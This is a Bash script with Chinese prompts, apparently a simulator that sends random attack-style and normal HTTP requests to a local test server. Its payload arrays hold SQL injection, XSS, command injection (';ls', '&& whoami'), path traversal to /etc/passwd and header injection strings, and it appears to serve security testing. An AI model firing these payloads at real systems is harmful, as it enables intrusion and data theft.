#!/bin/bash

# Function to perform random security tests
function random_security_test() {
    echo -e "\n开始随机安全测试..."
    
    # Get user input for number of requests
    read -p "请输入要模拟的请求次数: " request_count
    
    # Validate input
    if ! [[ "$request_count" =~ ^[0-9]+$ ]]; then
        echo "错误: 请输入一个正整数"
        return
    fi
    
    # Define test types (1-5 are attacks, 6 is normal)
    test_types=(
        "SQL注入测试"
        "XSS测试"
        "命令注入测试"
        "目录遍历测试"
        "HTTP头注入测试"
        "正常访问"
    )
    
    # Define URLs
    urls=(
        "http://127.0.0.1:8080/login"
        "http://127.0.0.1:8080/search"
        "http://127.0.0.1:8080/execute"
        "http://127.0.0.1:8080/download"
        "http://127.0.0.1:8080/admin"
        "http://127.0.0.1:8080/index.html"
    )
    
    # Define payloads for each test type [1]
    sql_payloads=("' OR '1'='1'" "' UNION SELECT null, username, password FROM users--")
    xss_payloads=("<script>alert(1)</script>" "javascript:alert(1)")
    cmd_payloads=(";ls" "&& whoami")
    dir_payloads=("../../../../etc/passwd" "..%5c..%5c..%5cwindows%5cwin.ini")
    header_payloads=("User-Agent: <script>alert(1)</script>" "Referer: javascript:alert(1)")
    
    for ((i=1; i<=request_count; i++)); do
        # Randomly select test type (1-6)
        test_type=$((RANDOM % 6 + 1))
        echo -e "\n测试 #$i: ${test_types[test_type-1]}"
        
        case $test_type in
            1) # SQL注入
                payload=${sql_payloads[$RANDOM % ${#sql_payloads[@]}]}
                echo "使用payload: $payload"
                response=$(curl -s -G --data-urlencode "username=$payload" --data-urlencode "password=test" "${urls[0]}")
                ;;
            2) # XSS
                payload=${xss_payloads[$RANDOM % ${#xss_payloads[@]}]}
                echo "使用payload: $payload"
                response=$(curl -s -G --data-urlencode "search=$payload" "${urls[1]}")
                ;;
            3) # 命令注入
                payload=${cmd_payloads[$RANDOM % ${#cmd_payloads[@]}]}
                echo "使用payload: $payload"
                response=$(curl -s -G --data-urlencode "cmd=$payload" "${urls[2]}")
                ;;
            4) # 目录遍历
                payload=${dir_payloads[$RANDOM % ${#dir_payloads[@]}]}
                echo "使用payload: $payload"
                response=$(curl -s -G --data-urlencode "file=$payload" "${urls[3]}")
                ;;
            5) # HTTP头注入
                payload=${header_payloads[$RANDOM % ${#header_payloads[@]}]}
                header_name=$(echo "$payload" | cut -d':' -f1)
                header_value=$(echo "$payload" | cut -d':' -f2-)
                echo "使用payload: $payload"
                response=$(curl -s -G -H "$header_name: $header_value" "${urls[4]}")
                ;;
            6) # 正常访问
                echo "正常访问"
                response=$(curl -s -G "${urls[5]}")
                ;;
        esac
        
        # Simple result analysis
        if [[ $test_type -ne 6 ]]; then
            if [[ -n "$response" ]]; then
                echo -e "\033[33m[响应接收]\033[0m"
            else
                echo -e "\033[32m[无响应]\033[0m"
            fi
        else
            echo -e "\033[34m[正常访问完成]\033[0m"
        fi
        
        # Random delay between requests (0.1-1 second)
        sleep $(awk "BEGIN {print $RANDOM/32767*0.9+0.1}")
    done
    
    echo -e "\n测试完成! 共执行了 $request_count 次请求"
}

# Main menu
function show_menu() {
    clear
    echo "=== 随机安全测试模拟器 ==="
    echo "1. 开始随机测试"
    echo "2. 退出"
}

# Main loop
while true; do
    show_menu
    read -p "请选择: " choice
    
    case $choice in
        1) random_security_test ;;
        2) echo "退出程序..."; exit 0 ;;
        *) echo "无效选择,请重新输入"; sleep 1 ;;
    esac
    
    read -p "按回车键返回菜单..."
done